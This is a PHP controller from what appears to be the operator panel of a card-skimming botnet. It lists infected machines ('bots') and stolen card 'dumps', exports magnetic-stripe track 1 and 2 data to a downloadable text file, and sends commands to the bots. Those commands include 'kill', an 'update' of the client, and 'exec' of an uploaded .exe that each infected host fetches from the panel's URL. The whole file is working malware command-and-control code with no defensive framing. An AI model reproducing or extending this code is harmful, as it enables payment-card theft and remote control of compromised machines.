<?php

class PanelController extends Controller
{
	public $layout='//layouts/panel';
	public $user;
	public $admin=0;
	public function __construct($id,$module=null)
	{
		$this->checkLogin();
		$this->user=User::model()->find('id=?',array(Yii::app()->user->getId()));
		Yii::app()->clientScript->registerCoreScript('jquery');
		parent::__construct($id,$module);
	}
	public function actionIndex()
	{
		$file = array();
		$file["directory"] = "clients/";
		$file["name"] = scandir($file["directory"]);
		$file["name"] = $file["directory"].end($file["name"]);
		$file["exists"] = file_exists($file["name"]);
		if($file["exists"]){
			$file["size"] = round(filesize($file["name"])/1024);
			$file["date"] = date("d F Y",filemtime($file["name"]));
		}
		$statistics = new Statistics();
		$this->render('index',array(
			"file"=>$file,
			"statistics"=>$statistics->getData()));
	}
	
	public function actionDumps(){
        $model = new Dump('search');
        $model->unsetAttributes();
 

        $columns = Dump::columns();
        $widget=$this->createWidget('ext.EDataTables.EDataTables', array(
            'id'            => 'dumpsList',
            'dataProvider'  => $model->search($columns),
            'ajaxUrl'       => $this->createUrl($this->getAction()->getId()),
            'columns'       => $columns,
			'bootstrap'     => true
        ));

        if (Yii::app()->getRequest()->getIsAjaxRequest()) {
            echo json_encode($widget->getFormattedData(intval($_GET['sEcho'])));
            Yii::app()->end();
            return;
        }

	$this->render('dumps', array('widget' => $widget));


	}
	public function actionBots($e=0,$s=0){
        $model = new Bot('search');
        $model->unsetAttributes();
 
        $columns = Bot::columns();
        $widget=$this->createWidget('ext.EDataTables.EDataTables', array(
            'id'            => 'botsList',
            'dataProvider'  => $model->search($columns),
            'ajaxUrl'       => $this->createUrl($this->getAction()->getId()),
            'columns'       => $columns,
			'bootstrap'     => true
        ));

        if (Yii::app()->getRequest()->getIsAjaxRequest()) {
            echo json_encode($widget->getFormattedData(intval($_GET['sEcho'])));
            Yii::app()->end();
            return;
        }
        $this->render('bots', array('widget' => $widget,'e'=>$e,'s'=>$s));
	}
	public function actionSettings(){
		$chpw_success=false;
		$chpw_model=new ChangePasswordForm;
		if(isset($_POST['ChangePasswordForm']))
		{
			$chpw_model->attributes=$_POST['ChangePasswordForm'];
			$chpw_model->user = $this->user;
			if($chpw_model->validate()){
				$chpw_model->change_password();
				$chpw_success=true;
			}
		}
		$this->render('settings',array(
			"chpw_model"=>$chpw_model,
			"chpw_success"=>$chpw_success
		));

	}
	public function actionExport($data){
		$ids = explode(",",$data);
		header("Content-type: text/plain");
		header('Content-Disposition: attachment; filename="dumps.txt"');

		$criteria=new CDbCriteria;
		
		$criteria->together = true;
		$criteria->with = array('bot');
		$criteria->compare('t.id',$ids);
		$criteria->compare('bot.user_id',Yii::app()->user->getId());
		$criteria->compare('t.archived',0);

		$dumps = Dump::model()->findAll($criteria);
		foreach($dumps as $dump){
			$tracks = $dump->getTracks();
			//print ($dump->card->number)."\t".($dump->created)."\t".(isset($tracks[1])?$tracks[1]:"")."\t".(isset($tracks[2])?$tracks[2]:"")."\t".($dump->bot->mac)."\t".($dump->bot->ip)."\t".($dump->bot->country->name)."\n";
			print (isset($tracks[1])?$tracks[1]:"").(isset($tracks[1])&&isset($tracks[2])?"\t":"").(isset($tracks[2])?$tracks[2]:"")."\n";
		}
	}
	public function actionRemove($type,$data){
		$ids = explode(",",$data);
		switch($type){
			case "dumps":
				foreach($ids as $id){
					$transaction = Yii::app()->db->beginTransaction();

					$update = Yii::app()->db->createCommand('UPDATE dumps INNER JOIN bots ON bots.id=dumps.bot_id SET dumps.archived=1 WHERE dumps.archived=0 AND bots.user_id=:user_id AND dumps.id=:id');
					$update->bindValue(":user_id",Yii::app()->user->getId());
					$update->bindValue(":id",$id);
					$update->execute();

					$transaction->commit();
				}
			break;
			case "bots":
				$criteria=new CDbCriteria;

				$criteria->compare('id',$ids);
				$criteria->compare('user_id',Yii::app()->user->getId());
				$criteria->compare('archived',0);

				$bots = Bot::model()->findAll($criteria);
				foreach($bots as $bot){
					$bot->addCommand("kill");
				}
				Bot::model()->updateAll(array("archived"=>1),$criteria);
			break;
			default:
				$this->redirect("/"); 
			break;
		}
		$this->redirect("/panel/".$type); 
	}
	public function actionCommand($data){
		$allowedExt = "exe";
		$allowedMimes = array("application/octet-stream", "application/x-msdownload", "application/exe", "application/x-exe", "application/dos-exe", "vms/exe", "application/x-winexe", "application/msdos-windows", "application/x-msdos-program");
		$temp = explode(".", $_FILES["file"]["name"]);
		$extension = end($temp);
		if (($_FILES["file"]["size"] < 5*1024*1024)
		&& $extension==$allowedExt
		&& in_array($_FILES["file"]["type"], $allowedMimes))
		{
			if ($_FILES["file"]["error"] > 0)
			{
				$this->redirect("/panel/bots/e/1");
			}
			else
			{
				$newname = Yii::app()->user->getId().date("YmdHis").rand(0,10000).".exe";
				if (file_exists("exec/" . $newname))
				{
					$this->redirect("/panel/bots/e/1");
				}
				else
				{
					move_uploaded_file($_FILES["file"]["tmp_name"], "exec/" . $newname);
					$ids = explode(",",$data);
					$criteria=new CDbCriteria;

					$criteria->compare('id',$ids);
					$criteria->compare('user_id',Yii::app()->user->getId());
					$criteria->compare('archived',0);

					$bots = Bot::model()->findAll($criteria);
					foreach($bots as $bot){
						$bot->addCommand("exec ".Yii::app()->getBaseUrl(true)."/exec/" . $newname);
					}
					$this->redirect("/panel/bots/s/1");
				}
			}
		}
		else
		{
			$this->redirect("/panel/bots/e/1");
		}
	}
	
	public function actionUpdate(){
		$allowedExt = "exe";
		$allowedMimes = array("application/octet-stream", "application/x-msdownload", "application/exe", "application/x-exe", "application/dos-exe", "vms/exe", "application/x-winexe", "application/msdos-windows", "application/x-msdos-program");
		$temp = explode(".", $_FILES["file"]["name"]);
		$extension = end($temp);
		if (($_FILES["file"]["size"] < 5*1024*1024)
		&& $extension==$allowedExt
		&& in_array($_FILES["file"]["type"], $allowedMimes))
		{
			if ($_FILES["file"]["error"] > 0)
			{
				$this->redirect("/panel/bots/e/1");
			}
			else
			{
				$newname = Yii::app()->user->getId().date("YmdHis").rand(0,10000).".exe";
				if (file_exists("exec/" . $newname))
				{
					$this->redirect("/panel/bots/e/1");
				}
				else
				{
					move_uploaded_file($_FILES["file"]["tmp_name"], "clients/" . $newname);
					
					$criteria=new CDbCriteria;
					$criteria->compare('user_id',Yii::app()->user->getId());
					$criteria->compare('archived',0);

					$bots = Bot::model()->findAll($criteria);
					foreach($bots as $bot){
						$bot->addCommand("update");
					}
					$this->redirect("/panel/bots/s/1");
				}
			}
		}
		else
		{
			$this->redirect("/panel/bots/e/1");
		}
	}
	public function actionError()
	{
		if($error=Yii::app()->errorHandler->error)
		{
			$this->render('error', $error);
		}
	}
	public function checkLogin(){
		if(Yii::app()->user->getIsGuest())
			$this->redirect(Yii::app()->homeUrl);
	}
}
